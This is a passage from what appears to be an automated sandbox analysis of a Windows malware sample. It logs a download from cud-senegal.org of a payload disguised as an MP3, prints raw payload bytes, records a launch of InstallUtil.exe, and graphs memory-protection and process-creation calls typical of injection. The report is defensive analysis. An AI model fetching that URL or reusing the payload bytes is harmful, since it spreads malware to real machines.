                                    Jan 14, 2025 15:10:40.613786936 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.613816977 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.613840103 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614068985 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614085913 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614151955 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614156008 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614408016 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614479065 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614500999 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614532948 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614537001 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614582062 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614595890 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614770889 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614792109 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614820004 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.614824057 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.614867926 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.615410089 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.615427017 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.615469933 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.615473986 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.615514994 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.615530968 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.679028034 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.679054976 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.679117918 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.679161072 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.679177999 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.679447889 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.704801083 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.704826117 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.704870939 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.704895020 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.704940081 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.704963923 CET4434972351.159.14.89192.168.2.25
                                    Jan 14, 2025 15:10:40.704969883 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.705023050 CET49723443192.168.2.2551.159.14.89
                                    Jan 14, 2025 15:10:40.707606077 CET49723443192.168.2.2551.159.14.89

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 14, 2025 15:10:37.683660984 CET6446753192.168.2.251.1.1.1
                                    Jan 14, 2025 15:10:37.978291035 CET53644671.1.1.1192.168.2.25
                                    Jan 14, 2025 15:12:38.194027901 CET5528553192.168.2.251.1.1.1
                                    Jan 14, 2025 15:12:46.144699097 CET5528553192.168.2.251.1.1.1

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 14, 2025 15:10:37.683660984 CET192.168.2.251.1.1.10xa844Standard query (0)cud-senegal.orgA (IP address)IN (0x0001)false
                                    Jan 14, 2025 15:12:38.194027901 CET192.168.2.251.1.1.10xb549Standard query (0)ecn.dev.virtualearth.netA (IP address)IN (0x0001)false
                                    Jan 14, 2025 15:12:46.144699097 CET192.168.2.251.1.1.10x6181Standard query (0)browser.events.data.msn.cnA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 14, 2025 15:10:37.978291035 CET1.1.1.1192.168.2.250xa844No error (0)cud-senegal.org51.159.14.89A (IP address)IN (0x0001)false
                                    Jan 14, 2025 15:12:38.201047897 CET1.1.1.1192.168.2.250xb549No error (0)ecn.dev.virtualearth.netssl2.tiles.virtualearth.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                    Jan 14, 2025 15:12:46.152185917 CET1.1.1.1192.168.2.250x6181No error (0)browser.events.data.msn.cnglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • cud-senegal.org

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.254972351.159.14.894438020C:\Users\user\Desktop\TiOWA908TP.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-14 14:10:39 UTC215OUTGET /post-postlogin/Gjflop.mp3 HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                    Host: cud-senegal.org
                                    Connection: Keep-Alive
                                    2025-01-14 14:10:39 UTC209INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Tue, 14 Jan 2025 14:10:39 GMT
                                    Content-Type: audio/mpeg
                                    Content-Length: 1377288
                                    Connection: close
                                    Last-Modified: Tue, 14 Jan 2025 08:26:21 GMT
                                    Accept-Ranges: bytes
                                    2025-01-14 14:10:39 UTC16175INData Raw: 31 bf 4a da 98 53 f2 e8 04 cd 86 60 9d c8 72 27 f4 63 3a 01 a6 b2 da 58 6a 75 07 32 a6 dd 63 1e 69 19 d0 f5 8b 71 d4 2a 4f 3d 80 a0 36 6f 66 c9 93 9a b9 97 06 fb 1c b1 40 ca 44 5b 8d 6f 84 e9 0e 3b 5f ff 4e 6f f2 b6 e5 8c 85 6f ac 20 a4 10 46 67 ec 98 75 93 63 74 d2 c2 9c f4 33 cb 47 56 7f b2 8d 68 f2 3a 90 1c 7c 43 54 1e dc e8 bc 9d 00 5e 12 d9 62 05 a5 25 2a 44 2e 5f 63 1d 4a b7 9d e9 d9 c8 85 42 44 e7 47 51 00 60 cf c1 c8 7b 45 8e d7 54 3a 7a fb 8a 8e aa 1f 40 8f 92 8c fb 16 5e 76 fc 8e 59 4f 7e 16 a6 e9 48 49 b5 3e 93 f1 99 73 9d 72 64 2b d1 01 c8 13 59 b2 cd f1 d3 72 82 bf 96 0e 1d 5b bf 82 28 9d 94 f7 c9 e8 68 3d 6c d5 72 2c be ff a2 76 8f 9b bd f4 a3 2a 35 28 41 e2 25 23 da fa 08 81 2b f9 80 23 57 93 ea 84 b5 67 f3 08 fd 5f 2d 5a 31 2c 20 65 42 79
                                    Data Ascii: 1JS`r'c:Xju2ciq*O=6of@D[o;_Noo Fguct3GVh:|CT^b%*D._cJBDGQ`{ET:z@^vYO~HI>srd+Yr[(h=lr,v*5(A%#+#Wg_-Z1, eBy
                                    2025-01-14 14:10:39 UTC16384INData Raw: db df 0c 34 06 28 25 9f ab 1a e2 d5 e1 cb 26 fd 28 ca 5e b8 3a 0c 35 df bc 1c 70 45 20 6a 30 c1 87 92 d9 d6 e6 4a ce 06 3f b6 50 15 1d f9 f8 d6 55 a4 55 5c df 65 ba 3a 06 1a 30 0c 9a ff 9a 6a 84 15 c1 a8 af 37 ae 18 f3 27 78 5a d6 a7 2c 7e 35 de c3 0a c0 db 2a 2c 1a 01 64 03 e0 1f de 84 8c 20 08 05 f1 01 cb 20 92 f4 02 ca 92 a0 fc 6c c0 a4 b5 1d 53 b9 d1 bd d2 20 2b ca 07 81 af 6c 89 f1 47 9a 85 0a 29 00 61 25 a8 f7 e8 84 28 a3 fb 63 24 51 ad 3a a5 2a 8e d9 64 e8 1e aa 8e 47 71 8c 55 5d c1 33 dd 8e 53 72 a5 47 b4 61 f6 74 87 45 ee 67 1b 6d 0c 2a 30 cc bc 33 a5 58 f3 50 37 b4 46 6f 76 7b bf a4 51 4e 96 2f 41 38 89 0e 16 d8 39 0b d0 9b 94 26 96 55 8a 4c 15 0c bb 9f ec 81 72 55 5f 8b 36 62 09 dc a6 f2 f8 19 a0 68 a2 26 ef c4 5c f4 4c ab ca bf 2b 06 e4 fc 6b
                                    Data Ascii: 4(%&(^:5pE j0J?PUU\e:0j7'xZ,~5*,d lS +lG)a%(c$Q:*dGqU]3SrGatEgm*03XP7Fov{QN/A89&ULrU_6bh&\L+k
                                    2025-01-14 14:10:39 UTC16384INData Raw: 93 95 93 80 b2 52 6f 6e 47 25 dc 88 87 e9 2f 85 42 44 58 f7 d2 ae c9 1d 2e bd 0b 38 82 80 d8 e1 62 70 b5 e2 a5 87 00 54 9c 8b 38 11 6b 95 a8 d9 7d 99 fd 4c 39 e1 9f b0 34 09 8f 82 13 c3 ef 48 f2 0a 2e a1 51 1d 6d bd 4c 5f ee bc f0 35 f0 9e 0b ba 79 a4 21 99 6c 50 25 35 a6 fc 10 41 f5 6d 7b f0 98 d9 01 b1 8b 32 86 ce 2d ad 50 e1 2f fa d5 df eb e6 de 35 4e ed 6a e6 8b cc 5f 6f 01 d9 8b cd 59 04 67 a6 ec 22 ea 72 68 13 09 7b 23 73 79 3e f2 da 48 b8 39 8a 0f 95 f6 5e 0d 09 00 06 a8 2a c7 2e 68 8c ba 59 36 98 ba 8d c7 4b 96 f6 01 45 bb a7 24 8a 32 c5 d8 c4 67 3b cc ba f6 a3 9e b3 e8 88 c8 db 97 47 9c f5 d4 ca 44 c7 fc 63 ec d3 2b 81 ac 81 3c 2b fe ca 06 5e f4 37 27 7a c4 21 b1 a0 ef 74 cf 36 ab 8b a3 e6 f9 54 b8 b3 28 12 26 33 c9 60 9b 25 f2 3c 0c 81 47 8a 7f
                                    Data Ascii: RonG%/BDX.8bpT8k}L94H.QmL_5y!lP%5Am{2-P/5Nj_oYg"rh{#sy>H9^*.hY6KE$2g;GDc+<+^7'z!t6T(&3`%<G
                                    2025-01-14 14:10:39 UTC16384INData Raw: ae 2d fa 93 4f 0e 09 4f 23 4b 8c cf df 17 1e 21 6a da d8 8e 2c 91 86 14 b8 f9 bc 05 8f 2c 15 b2 51 f0 1c 43 ac 9c 9e 55 e6 ea f4 15 b3 3c 4e 7a f0 ff c2 52 56 20 f8 d6 27 6d 2d b5 06 4c 42 e5 cd 1a e1 bd 78 0a a0 d3 df df 3e 68 df c0 b9 96 da 39 43 24 73 ea f5 7f b1 9b 49 70 5b 64 a3 ae 76 b8 e7 04 7d 81 68 4f ad 05 4f 86 bb c5 bb a8 05 24 cc fc 5b c4 eb 3f 10 4a 3b 9c 06 37 b9 c6 c6 12 37 aa b7 37 81 50 a1 e3 1d 96 74 9d 08 3d 3e 95 59 74 cc 0f b2 0a 93 71 c6 96 c5 9a e7 c1 84 42 de 38 08 63 77 81 e5 b6 51 ff aa e3 3b f6 45 b4 8c 47 ba 6f 1a 65 da 77 1d f8 ca 18 34 f3 c7 f2 68 87 57 ce 1b ad b3 97 83 24 b9 93 9e cd 80 e2 17 64 45 c3 29 9a f2 06 e0 b7 d3 95 6d 68 db 36 46 2e b4 0a ba 3f 44 5c 82 52 d9 25 f8 13 de 07 80 78 ea 1c 89 3b 88 19 77 60 b2 f6 ab
                                    Data Ascii: -OO#K!j,,QCU<NzRV 'm-LBx>h9C$sIp[dv}hOO$[?J;777Pt=>YtqB8cwQ;EGoew4hW$dE)mh6F.?D\R%x;w`
                                    2025-01-14 14:10:39 UTC16384INData Raw: f8 a9 a7 aa ac 2f 11 6c 13 53 fd 10 dc 4f ed a7 1c b4 95 e3 38 64 51 e2 42 cf 46 d4 60 9f ba 63 49 d0 b4 5e 0d 7b 22 bc fc 9e ab 74 cd fb cb 5e cf 49 49 8c fe 67 51 88 63 99 d2 1f 9e 28 60 1f bd f8 b5 af c9 cd 03 60 29 f6 bf 54 9f c9 a6 38 5a 38 c3 21 b4 ed b0 5f 5a 7f 78 e3 d2 75 fd 5b 8f 87 51 1c f2 32 52 7e 4b f1 92 57 0c 7e 1b 8b c1 bc 60 c4 80 59 0a 56 2a b3 41 2f 61 42 11 b3 2f d1 df 2f f4 eb a9 a7 92 0d ec a8 ee eb 85 6b 95 14 df 69 43 38 ff 27 92 da 9d b8 0f f0 7c 5d 14 9d 45 f0 62 ff 6f ef 29 79 78 2e 4b 06 b8 da 5b 71 7b 41 12 c5 cd bb 83 8d 5c a3 2b 2f b5 07 85 80 cb b9 45 fb d7 fc 72 5f 38 75 d1 38 cb e8 a7 96 6f 12 b3 d8 8c b2 f8 43 3e c3 8a 0e 3f be 92 77 f6 af 70 88 57 42 5d 10 99 e8 44 6a a2 69 e1 9b 03 c7 53 e0 65 ed ac f5 b0 dc d7 ca bc
                                    Data Ascii: /lSO8dQBF`cI^{"t^IIgQc(``)T8Z8!_Zxu[Q2R~KW~`YV*A/aB//kiC8'|]Ebo)yx.K[q{A\+/Er_8u8oC>?wpWB]DjiSe
                                    2025-01-14 14:10:39 UTC16384INData Raw: 64 6d 76 de e5 c1 62 38 2b c7 91 5c 82 2d 30 07 f5 26 98 16 f8 36 b1 ba 4a de dd b5 98 31 50 57 1d 64 8b 91 e7 02 a1 53 c0 39 72 24 75 6b ca 8a c1 87 42 40 e2 3c 83 10 2b 38 07 15 06 0b 37 5c e6 58 3f 05 95 a6 26 47 4c ab c9 e8 8e a6 10 a8 90 3d 38 83 7e e4 8b 5b a0 f4 22 61 a6 0c 21 2d d9 5b ec e0 24 d1 d1 29 9d 97 fb 35 a5 27 5a 85 35 a4 2c 44 ee 4b fb c7 f9 24 c0 57 42 9f e4 74 52 a2 53 e7 cd 6d 95 c4 73 f6 d6 ed 49 10 ce ce 21 f9 ca f9 fb fb b0 ba 9e 1d cc 03 ae d7 6a fe 05 51 12 23 0f 0a cd 47 53 ea 38 c8 c3 d1 fd a3 ef 7f b6 c5 37 4e 43 86 db 34 28 5e 5c 18 3f c0 fa 53 dc fd bd ae 09 33 bd 85 e4 af f9 8d 93 45 2a fa 59 17 2c c3 9b 11 07 a7 a2 ca 4c e7 13 e7 55 61 c4 0d 46 58 4a cb 89 14 07 c2 90 84 4d 15 7f 30 db 2f ab fa 4b 94 1c ba 4f 47 9b 02 09
                                    Data Ascii: dmvb8+\-0&6J1PWdS9r$ukB@<+87\X?&GL=8~["a!-[$)5'Z5,DK$WBtRSmsI!jQ#GS87NC4(^\?S3E*Y,LUaFXJM0/KOG
                                    2025-01-14 14:10:39 UTC16384INData Raw: ae b8 b8 69 b1 68 e1 e4 68 b9 f3 e3 be 99 8e 21 f1 c9 d5 be 67 68 a9 bb 70 cc 6e 34 7a a7 cb fa 73 ed 5e b2 ea 45 2b f6 3d 89 7e 34 47 79 5d ff 6c 58 64 54 76 e6 f3 b4 0a 6d 9f 07 08 b1 ba c3 12 eb aa 8d 14 1e 09 8f 7f 49 46 32 89 16 7f 6f 7c 07 b6 de 17 06 95 df b7 bb 7b 1a 01 92 d9 0b 49 69 6c 74 78 e2 09 53 01 a3 49 38 fa 7c 17 00 99 4c 6e f3 33 aa 23 6c b3 90 f9 ec b2 3d 24 96 1b e9 c4 60 d5 48 e3 12 34 49 e2 cd a8 96 4b 89 b1 19 89 a1 10 82 e4 0e 1b b8 a5 67 96 41 78 b3 88 45 0f 4c 2f 2a 03 2c 47 d7 cf d6 ee ee 4d ad 4b ef d2 0d 0e 00 72 64 6b 8f 9c f5 ec a7 6b ec af 63 98 47 51 40 f6 78 f9 80 85 33 64 d2 64 ed 97 18 e9 84 a1 f6 41 cb 08 f8 16 e5 c8 f1 bb 02 a7 0d 13 1e b9 aa 3c 64 14 64 b8 21 71 30 7e e7 42 12 e8 4d 0a e6 18 ca d3 5b 0a ed bc 71 68
                                    Data Ascii: ihh!ghpn4zs^E+=~4Gy]lXdTvmIF2o|{IiltxSI8|Ln3#l=$`H4IKgAxEL/*,GMKrdkkcGQ@x3ddA<dd!q0~BM[qh
                                    2025-01-14 14:10:39 UTC16384INData Raw: fa 5e 35 23 9f 1e 97 fe c5 ce 33 73 67 3b 0f 45 7a 08 21 72 fc 8b 45 7a 42 1b c2 a0 fb f6 8d 83 4c 1c 44 8a f9 20 22 4d 88 bf 77 bc a7 2c ac 85 f5 2a a0 9c d4 7a e9 58 f2 32 59 03 ce 3e 20 f1 87 58 f5 6d 6e 76 ae bb 38 9b 4d 03 b9 48 aa 7f c9 e7 f6 ed b2 fa 56 c6 b2 e1 fb 82 9e 79 bb 8e f3 0e 5f c2 9f 15 3a e5 63 1e d1 fc 94 e9 43 ee ee f8 2a f1 36 4d a2 21 51 b3 04 71 bd 96 b1 75 08 e2 58 1e db e5 27 db ee 54 1c dd 8d 5e f4 70 39 7e 83 04 f6 b1 2e 82 a9 62 54 6b 73 c1 f1 6b 52 97 f7 d3 21 53 d7 89 3a 33 4e e8 e4 d6 8d 3e e1 0d 86 f2 b1 6b 6e f2 27 b1 5e 47 c5 c0 8c dd 3f f6 a9 a8 7e 75 05 36 c5 eb aa fd 2b 30 31 31 89 b0 61 48 9d 7b 70 2e 27 6f e5 9a 74 8d 21 7f 06 78 50 75 f5 a2 09 d3 56 f9 fc ad 1e c5 11 74 6f 2a af 8f 80 75 9e 2d fd c3 00 f1 88 33 04
                                    Data Ascii: ^5#3sg;Ez!rEzBLD "Mw,*zX2Y> Xmnv8MHVy_:cC*6M!QquX'T^p9~.bTkskR!S:3N>kn'^G?~u6+011aH{p.'ot!xPuVto*u-3
                                    2025-01-14 14:10:39 UTC16384INData Raw: 8b bd 1f 69 53 d0 43 8c c1 fd 25 b7 14 fa 5b 13 94 d0 f9 be 71 1f 4a 24 cc 0c c3 a9 fb b3 14 1b a6 9f 15 ac 04 5b e0 58 d4 8a 8f 6b fc 9b 14 19 23 47 63 c2 a0 58 b1 6c 77 14 36 4e 15 55 38 e0 95 d5 95 88 c9 48 6d 0c 5d 3f 5a 9d 06 05 d7 ec 68 c9 84 f4 1b 41 8e a3 8c 7f 3a c0 2a 3a 9f 91 cb 4e f0 03 39 ff bb 12 b5 e1 7a 8a 77 88 7b cc 07 97 97 2c 6b a2 d8 36 c8 7a f5 74 ee 87 eb b0 2b 5d e2 7a 4f bb d7 a4 87 27 7a c0 d6 ad 30 e9 18 98 63 b9 ab 62 79 5a ca 57 b2 e2 73 a4 1e 18 af 8e 99 66 4c d4 60 d8 de 71 18 4d 3c b9 92 c3 a2 7d 0d d5 ad 34 69 69 38 96 0c 70 fd a7 e0 b7 44 fa 36 e3 9d 59 0d 24 ac 24 03 52 4b 14 a4 90 a7 0e 60 4f 9d 38 f5 d2 8c 6f c1 60 89 d6 00 b8 3e ec 3a ee c4 c4 6f 72 a9 f5 99 30 ca 29 2d f2 10 78 fd 6c 93 91 3a c5 cf 62 21 63 72 0b 1c
                                    Data Ascii: iSC%[qJ$[Xk#GcXlw6NU8Hm]?ZhA:*:N9zw{,k6zt+]zO'z0cbyZWsfL`qM<}4ii8pD6Y$$RK`O8o`>:or0)-xl:b!cr
                                    2025-01-14 14:10:39 UTC16384INData Raw: 8f a6 33 db 73 b1 78 b2 79 87 f1 55 09 05 6c be 44 76 0c 2e 5e 0e b6 1a d4 d0 4d 43 0b eb c4 bc 6b ad c6 a9 6c aa 18 df a4 70 41 82 3b 92 0b 5f d2 21 fc 09 74 e8 ce 8b 51 40 b9 a2 1d e1 cf 99 bd 3d 7b ef 8b 57 20 d4 a5 f7 2f 1a b4 d3 33 03 5c 49 6e 39 61 2e de 5e 60 37 97 3b 55 76 1e 64 50 b0 ba cb df 6f df 28 5f b9 af 99 62 19 44 74 c5 d6 a4 55 f5 a4 a9 be 19 1f eb 41 de a0 52 dd d8 2b 2a dd da 8c 48 70 6c bc 24 d3 34 37 73 36 53 e0 ee fb cb 56 b9 b9 78 8a c1 5b c6 3b 37 c2 1d 04 24 2b f8 7e f7 39 f1 d9 f6 9a a2 0b d7 77 0d 72 0a ac 2f 04 93 2a 25 a0 f6 e1 10 b3 cb d8 4c 87 27 95 0c 84 d5 7f f6 d5 39 f3 61 4e 84 c2 d6 4e de 0c e8 de 75 15 0b 8a f4 33 9f f5 c6 14 f2 f0 d2 4d 20 ab ee 05 06 25 48 b6 d9 39 6f 15 3c b4 d4 31 1a f1 c2 4a 33 9a 16 03 cf c5 e8
                                    Data Ascii: 3sxyUlDv.^MCklpA;_!tQ@={W /3\In9a.^`7;UvdPo(_bDtUAR+*Hpl$47s6SVx[;7$+~9wr/*%L'9aNNu3M %H9o<1J3


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:10:36
                                    Start date:14/01/2025
                                    Path:C:\Users\user\Desktop\TiOWA908TP.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\TiOWA908TP.exe"
                                    Imagebase:0xa40000
                                    File size:104'857'600 bytes
                                    MD5 hash:F1BBCBCF580673F86692045F0E6C1141
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1702291708.0000000006B20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1680699788.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:09:11:03
                                    Start date:14/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                    Imagebase:0x460000
                                    File size:35'280 bytes
                                    MD5 hash:25132339A1686033BDC9561ECFE57719
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:09:11:05
                                    Start date:14/01/2025
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1192
                                    Imagebase:0xbb0000
                                    File size:522'624 bytes
                                    MD5 hash:AA47AAA34035C6EB09F8ACA062E66C9D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:4.1%
                                      Total number of Nodes:219
                                      Total number of Limit Nodes:13
                                      execution_graph 60148 130d030 60149 130d048 60148->60149 60150 130d0a3 60149->60150 60153 68f0f88 60149->60153 60159 68f0f81 60149->60159 60154 68f0fb0 60153->60154 60165 68f1408 60154->60165 60171 68f13d1 60154->60171 60177 68f1418 60154->60177 60155 68f0fd7 60155->60155 60160 68f0fb0 60159->60160 60162 68f1408 2 API calls 60160->60162 60163 68f1418 2 API calls 60160->60163 60164 68f13d1 2 API calls 60160->60164 60161 68f0fd7 60161->60161 60162->60161 60163->60161 60164->60161 60166 68f13b0 60165->60166 60167 68f1416 60165->60167 60166->60155 60170 68f15db 60167->60170 60182 68f0530 60167->60182 60170->60155 60172 68f13da 60171->60172 60173 68f1424 60171->60173 60172->60155 60174 68f0530 2 API calls 60173->60174 60176 68f15db 60173->60176 60175 68f15cc 60174->60175 60175->60155 60176->60155 60178 68f1445 60177->60178 60179 68f0530 2 API calls 60178->60179 60181 68f15db 60178->60181 60180 68f15cc 60179->60180 60180->60155 60181->60155 60184 68f0557 60182->60184 60183 68f0614 60183->60155 60187 68f0978 60184->60187 60191 68f0980 60184->60191 60188 68f09c8 VirtualProtect 60187->60188 60190 68f0a03 60188->60190 60190->60183 60192 68f09c8 VirtualProtect 60191->60192 60194 68f0a03 60192->60194 60194->60183 60321 6c588e7 60322 6c58527 60321->60322 60326 6cce508 60322->60326 60332 6cce560 60322->60332 60337 6cce550 60322->60337 60327 6cce577 60326->60327 60329 6cce512 60326->60329 60328 6cce58b 60327->60328 60342 6cce590 60327->60342 60347 6cce5a0 60327->60347 60328->60322 60329->60322 60333 6cce575 60332->60333 60335 6cce590 2 API calls 60333->60335 60336 6cce5a0 2 API calls 60333->60336 60334 6cce58b 60334->60322 60335->60334 60336->60334 60338 6cce560 60337->60338 60340 6cce590 2 API calls 60338->60340 60341 6cce5a0 2 API calls 60338->60341 60339 6cce58b 60339->60322 60340->60339 60341->60339 60343 6cce5a0 60342->60343 60344 6cce78d 60343->60344 60352 6ce1f98 60343->60352 60356 6ce1f90 60343->60356 60344->60328 60348 6cce5ca 60347->60348 60349 6cce78d 60348->60349 60350 6ce1f98 SleepEx 60348->60350 60351 6ce1f90 SleepEx 60348->60351 60349->60328 60350->60348 60351->60348 60353 6ce1fd8 SleepEx 60352->60353 60355 6ce2016 60353->60355 60355->60343 60357 6ce1fd8 SleepEx 60356->60357 60359 6ce2016 60357->60359 60359->60343 60383 13525c0 60384 13525dc 60383->60384 60385 13525ec 60384->60385 60391 1359357 60384->60391 60396 1355978 60384->60396 60401 1357a63 60384->60401 60405 13593d1 60384->60405 60411 1355397 60384->60411 60392 1359363 60391->60392 60395 68f0530 2 API calls 60392->60395 60416 68f0520 60392->60416 60393 1359372 60395->60393 60397 1355997 60396->60397 60399 68f0520 2 API calls 60397->60399 60400 68f0530 2 API calls 60397->60400 60398 13559bb 60398->60385 60399->60398 60400->60398 60421 68f1800 60401->60421 60425 68f1810 60401->60425 60402 1357a84 60406 1359363 60405->60406 60407 13593d8 60405->60407 60409 68f0520 2 API calls 60406->60409 60410 68f0530 2 API calls 60406->60410 60408 1359372 60409->60408 60410->60408 60412 13553b6 60411->60412 60414 68f0520 2 API calls 60412->60414 60415 68f0530 2 API calls 60412->60415 60413 13553db 60414->60413 60415->60413 60418 68f0530 60416->60418 60417 68f0614 60417->60393 60419 68f0978 VirtualProtect 60418->60419 60420 68f0980 VirtualProtect 60418->60420 60419->60417 60420->60417 60422 68f1825 60421->60422 60429 68f1850 60422->60429 60426 68f1825 60425->60426 60428 68f1850 3 API calls 60426->60428 60427 68f183d 60427->60402 60428->60427 60430 68f1887 60429->60430 60435 68f1a18 60430->60435 60440 68f1961 60430->60440 60444 68f1968 60430->60444 60431 68f183d 60431->60402 60436 68f19c9 VirtualAlloc 60435->60436 60439 68f1a26 60435->60439 60438 68f19e2 60436->60438 60438->60431 60439->60431 60441 68f19a8 VirtualAlloc 60440->60441 60443 68f19e2 60441->60443 60443->60431 60445 68f19a8 VirtualAlloc 60444->60445 60447 68f19e2 60445->60447 60447->60431 60375 5b838e0 60376 5b8392e NtProtectVirtualMemory 60375->60376 60378 5b83978 60376->60378 60379 5b846e0 60380 5b84744 CreateProcessA 60379->60380 60382 5b848cc 60380->60382 60453 6c5853e 60454 6c58527 60453->60454 60455 6cce508 2 API calls 60454->60455 60456 6cce550 2 API calls 60454->60456 60457 6cce560 2 API calls 60454->60457 60455->60454 60456->60454 60457->60454 60195 6c58859 60196 6c58863 60195->60196 60200 6cea759 60196->60200 60205 6cea760 60196->60205 60197 6c588a1 60201 6cea760 60200->60201 60202 6cea78b 60201->60202 60210 6cead5a 60201->60210 60216 6cea984 60201->60216 60202->60197 60206 6cea775 60205->60206 60207 6cea78b 60206->60207 60208 6cead5a 8 API calls 60206->60208 60209 6cea984 8 API calls 60206->60209 60207->60197 60208->60207 60209->60207 60211 6cea985 60210->60211 60212 6cea7f7 60210->60212 60211->60212 60221 6cec198 60211->60221 60225 6cec1a8 60211->60225 60213 6ceaae9 60213->60202 60217 6cea98a 60216->60217 60219 6cec198 8 API calls 60217->60219 60220 6cec1a8 8 API calls 60217->60220 60218 6ceaae9 60218->60202 60219->60218 60220->60218 60222 6cec1a8 60221->60222 60229 6cec4ce 60222->60229 60226 6cec1bd 60225->60226 60228 6cec4ce 8 API calls 60226->60228 60227 6cec1df 60227->60213 60228->60227 60230 6cec4e6 60229->60230 60234 6cecae8 60230->60234 60244 6cecae3 60230->60244 60231 6cec1df 60231->60213 60235 6cecafd 60234->60235 60236 6cecb1f 60235->60236 60254 6ced0d4 60235->60254 60259 6ced5d6 60235->60259 60264 6ced869 60235->60264 60269 6ced24e 60235->60269 60274 6ced493 60235->60274 60279 6ced7a3 60235->60279 60284 6ced972 60235->60284 60236->60231 60245 6cecae8 60244->60245 60246 6cecb1f 60245->60246 60247 6ced24e 2 API calls 60245->60247 60248 6ced869 2 API calls 60245->60248 60249 6ced5d6 2 API calls 60245->60249 60250 6ced0d4 2 API calls 60245->60250 60251 6ced972 2 API calls 60245->60251 60252 6ced7a3 2 API calls 60245->60252 60253 6ced493 2 API calls 60245->60253 60246->60231 60247->60246 60248->60246 60249->60246 60250->60246 60251->60246 60252->60246 60253->60246 60255 6ced0de 60254->60255 60289 5b86558 60255->60289 60293 5b86551 60255->60293 60256 